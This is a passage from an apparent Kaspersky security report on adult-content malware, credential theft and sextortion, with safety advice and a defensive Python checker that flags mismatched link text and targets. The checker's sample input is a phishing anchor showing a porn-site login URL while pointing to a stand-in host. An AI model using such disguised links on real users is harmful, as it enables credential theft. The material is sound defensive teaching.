Overall, the amount of downloadable malware disguised as pornography detected on users’ devices significantly decreased in 2018 in comparison with record activity in 2017. While at first glance this looks like good news, a worrying trend has appeared. The number of users being attacked with malware that hunts for their pornographic content credentials is on the rise and this means premium subscriptions are now a valuable asset for cybercriminals. There is also the fact that many modern pornography websites include social functionality, allowing people to share their own private content in different ways through the website. Some people make it freely available for all, some decide to limit who can see it. There has also been a significant rise in the number of cases where people suffer from sextortion. In other words, the sphere of adult-content may contain cybersecurity challenges other than the ‘classic’ infected pornography websites and video files armed with malware. These challenges should be addressed properly.
Another, perhaps less obvious, cybersecurity risk that adult content brings is the misuse of corporate resources. As mentioned at the beginning of this report, unsafe consumption of pornography in the workplace may result in the corporate network being hit by a massive infection. While most malicious attacks using pornography are aimed at consumers, not corporations, the fact that most consumers have a job to go to every day brings a certain risk to IT administrators responsible for securing corporate networks.
In order to consume and produce adult content safely, Kaspersky Lab advises the following:
- Before clicking any link, check the link address shown, even in the search results of trusted search engines. If the address was received in an e-mail, check if it is the same as the actual hyperlink.
- Do not click on questionable websites when they are offered in search results and do not install anything that comes from them.
- If you wish to buy a paid subscription to an adult content website – purchase it only on the official website. Double check the URL of the website and make sure it is authentic.
- Check any email attachments with a security solution before opening them, especially attachments from dark web entities (even if they are expected to come from an anonymous source).
- Patch the software on your PC as soon as security updates for the latest bugs are available.
- Do not download pirated software or other illegal content, even if you were redirected to the webpage from a legitimate website.
- Use a reliable security solution with behavior-based anti-phishing technologies, such as Kaspersky Total Security, to detect and block spam and phishing attacks.
- Use a robust security solution to protect you from malicious software and its actions, such as Kaspersky Internet Security for Android.
- Educate employees in basic security hygiene, and explain the policies on accessing web sites potentially containing illegal or restricted content, as well as not opening emails or clicking on links from unknown sources.
- Businesses can also block access to web sites that contravene corporate policy, such as porn sites, by using a dedicated endpoint solution such as Kaspersky Endpoint Security for Business. In addition to anti-spam and anti-phishing, it must include application and web controls, and web threat protection that can detect and block access to malicious or phishing web addresses.
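The first piece of advice above, comparing the link text shown with the actual hyperlink target, can be automated for HTML e-mails. The following sketch, built only on Python’s standard library, flags anchors whose visible text looks like a URL on a different host than the real destination; it is an illustration, not a complete phishing filter.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class LinkChecker(HTMLParser):
    """Flag <a> tags whose visible text looks like a URL on a
    different host than the actual href destination."""

    def __init__(self):
        super().__init__()
        self._href = None
        self._text = []
        self.suspicious = []  # (visible_text, real_href) pairs

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            text = "".join(self._text).strip()
            # Only compare when the visible text itself looks like a URL.
            if text.startswith(("http://", "https://", "www.")):
                shown = urlparse(text if "://" in text else "http://" + text).hostname
                real = urlparse(self._href).hostname
                if shown and real and shown != real:
                    self.suspicious.append((text, self._href))
            self._href = None

# Invented example e-mail body: the link claims to go to pornhub.com
# but actually points elsewhere.
checker = LinkChecker()
checker.feed('<a href="http://evil.example/login">https://pornhub.com/login</a>')
print(checker.suspicious)  # → [('https://pornhub.com/login', 'http://evil.example/login')]
```

A mismatch between the displayed URL and the href host is exactly the discrepancy the advice asks readers to check by hand before clicking.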
Ransomware has been making a lot of splashy headlines over recent years with high profile attacks, such as WannaCry and NotPetya, dominating the news in large-scale breaches. While these massive breaches are certainly terrifying, the more common attacks are actually being inflicted across much smalle